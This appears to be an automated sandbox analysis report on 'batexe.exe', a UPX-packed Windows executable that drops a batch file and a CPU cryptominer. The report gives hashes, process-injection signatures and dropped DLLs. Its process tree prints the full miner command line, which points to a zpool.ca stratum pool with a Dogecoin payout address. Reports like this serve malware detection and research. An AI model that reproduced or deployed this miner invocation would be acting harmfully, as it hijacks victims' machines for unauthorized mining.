73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
305s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
11-02-2024 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
872	b2e.exe
4704	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4704	cpuminer-sse2.exe
4704	cpuminer-sse2.exe
4704	cpuminer-sse2.exe
4704	cpuminer-sse2.exe
4704	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4724-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4724 wrote to memory of 872	4724	batexe.exe	74
PID 4724 wrote to memory of 872	4724	batexe.exe	74
PID 4724 wrote to memory of 872	4724	batexe.exe	74
PID 872 wrote to memory of 3232	872	b2e.exe	75
PID 872 wrote to memory of 3232	872	b2e.exe	75
PID 872 wrote to memory of 3232	872	b2e.exe	75
PID 3232 wrote to memory of 4704	3232	cmd.exe	78
PID 3232 wrote to memory of 4704	3232	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4724
- C:\Users\Admin\AppData\Local\Temp\1289.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1289.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1289.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1930.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1289.tmp\b2e.exe

Filesize
3.0MB

MD5
1a717549661a7dc49d36939387b83281

SHA1
bfade6b6264c2e19a747ec8a6765b22f620769e7

SHA256
d9b5824fbec78893adb63ee81a5da55d6f9f0903a6b11c1d03ab853acd5dabc3

SHA512
03cb36aefa2fd2dfb1f317f2fe5f61ef92f97b122b04b15116ff7082ac894621cc5378c9efcd32da0d9c25e86d5480f8a78cdb04a773c37c143bdbd65bfe7aae

Download Submit
C:\Users\Admin\AppData\Local\Temp\1289.tmp\b2e.exe

Filesize
3.3MB

MD5
1d5c105855d7987619c9e5324c917193

SHA1
bc378f536e2b3393e4cef4fa404b996226c8c762

SHA256
1e7b5f8fc61a0e838ed15f4578dd2627ec7ab367438a3d48eb3d2bc295eff959

SHA512
becebd6988d5ca69c281d0955753d773d74bd602072384fca3432f815a85b047964bf1442ddec4f0c7285dd37bcc7bc906a1da9b627d358ccfc640241625920c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1930.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
340KB

MD5
59b1dfbb61e79518563c5c2039df014d

SHA1
0e2687ca1c6bd186928625278a357a958fd31720

SHA256
e9aaaf4f3c14800e73da98f84d17483f00d9bbc0796fecd0687fff62cc0bb57c

SHA512
934da3cbba469c23d5a09a8593f361f86e1fc9cc7fcb2ea6b9d89a6dcd41bed494c8719b288014d8357915667f285f722111e9b01c1a16ecf7e73899a460ff81

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
394KB

MD5
ac80f6fb8c2d641bf50a3d49a3a4cb46

SHA1
e0b4ae8ab0eb2f812584b5f481a31c0f4c6114a7

SHA256
c6945fcc046f6b0ad5932bcd5468abbe4d9258caa10390e1fe03cb7764765b59

SHA512
9f4e30b7e0a521a24e331f31f973801bf27816c5e8280a4149446769791932d79f3e18a86cacfb02e8af04bdd4bcfe55945345724532dfc367d37308ecc2ff87

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
298KB

MD5
8ded9241bf70de5bc2bea2c9310ca52f

SHA1
a51f0ecc70fa72c1085e09f9ebb3150a48c3b4f3

SHA256
b814b33014775d265915540c05aba09f8d25b2edd3281eab7b93f8efeb5e2468

SHA512
f3af49bb7a813693b4b7fb803413d5ec864811921972a5f1cc30106c17c42aae4f87995e12f01a0559f1a3f5da1a3521baad1fa9d099827b038db4b4c25c934d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
374KB

MD5
6885fdf4af84c0527fe0ba1632fbd76e

SHA1
f107d5330000661da1910cd78b6aac556493a11c

SHA256
56fde5b23bb0110cc71d90e72944725d3248db70d9c1ecc0e253f2c6cb3f73b9

SHA512
038b1f297e576d006401c2a3694e896ee35fcab5b7d47d2e1a19f6a03f8159fe1de8acfd501d9118868663731cd4cc9003ebd94555cbd313a9c5e82b8c662c3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
304KB

MD5
358d324e25e61d833df58e277f6acc11

SHA1
7cc230ea175a186fb7c77fd057d1d8a8cf273610

SHA256
82bed47ecc5d6516e73ba34b74c1872e8c58b3c2129e7cba98b34d3cdc2b0a0e

SHA512
ab2073d49ea89e51f3b34c8552d7a4221c0defd0f1a200795e3d4f564ab73ff42cc03224374a6efbaaa149ee21a4b7fe77cfd297e5824dc22e8f2e51308040a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
331KB

MD5
b2e283e53ce03e3c94d7c2ec50f7ec59

SHA1
12d8730f3983ab40c79f3869838918fdd016a4f2

SHA256
c039b8cf176faccddd5dedb550c5af64edec512e2a3cf6bac0eef1575947ff40

SHA512
767fe6f0102e2124724cd79ac4747646194a58eb4a458a14b7a1f7871789c280b8afece4ea22af2bb81be492d19e69e5ec01f47d900e595d19ba127c6ad68b40

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
366KB

MD5
7bcfdb819cd9cd8f2fcd394b55d54cf5

SHA1
0d5e5d05ae288ba22a7652221c97569b79f280e6

SHA256
78665fb371d6667089ee92c435c9192e1866918516170f3ac51a1f2834c7e13b

SHA512
6f2c340088c8233e8a9053c8a667c72c9ee8b63311793bd3448a3878b04c7ba2b337d09241ea8bc12b7c36d0b3a3a62262f146e4e2770095802eadde69deb472

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
367KB

MD5
5d346b91fb3b112a6137703d6a4895fa

SHA1
5a11ab62872a7a0f07c4aa6bd9f4af815e0c25df

SHA256
b29e1dca27d57f57802e17d6773bb5f16328557df00cd7b8189090d4764d98c0

SHA512
ec429046ae29f1f30fb69438a62b7df97bd63f5da5beebe5ad47e43545539baf3ecb82fa766113ee46ee7f87fe7047041aa55df5c3af9beab880d914bf60511b

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
295KB

MD5
b635642a427e5b5ec8b93aae9ee63e8a

SHA1
6d01679babb6f491d2d7e1b7f2398c76f6c02068

SHA256
ec75d5125b6dd70e40453f1fc5db2d199c758cc26f15dfe1fc25d5e68dd8a2a1

SHA512
cce0f8b529c4447d851e594bd67270a33364db558d898cb773af4213e4351cdc665889afa2652e7d27bab73defc88ea2c9e983d25956e90037cdabdd3e274911

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
253KB

MD5
44e7302f8eb97a6329ca185a0c302324

SHA1
f04b6ff84066dcda4bc64ff83fdd9a5ad5293562

SHA256
34ea40335d64ef93dd2b94fc6db5d641cf45ad1054f67509b59ef798d7a0a1ed

SHA512
f7ad63eb2222a7761c8789454fb5a917519875cee0f38ed6a24532d723eced9666134512f97572a37da473837c2d7f86cccb5617ba491248a0adebe77febedb7

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
136KB

MD5
c01dde54bd2850ecfe187da4b185dc9e

SHA1
d84440c4d4564fae5815a2c0bd9a0d0caf76a06f

SHA256
826c3343a4d5d53b12c83e0a95b5cb8d69a3d32752e2bdbcb117e223f9598c7a

SHA512
8e47a8b83f821e314abb5fb388172cf2f2e79861340726e4d0bc6f345ca3bb21e2aeac35f27c2c7a9548cd94395552ff11d749689a1c7a1a68ef4b5d318af7de

Download Submit
memory/872-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/872-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4704-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-43-0x00000000580D0000-0x0000000058168000-memory.dmp

Filesize
608KB

Download
memory/4704-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4704-44-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/4704-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4704-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4704-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4724-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download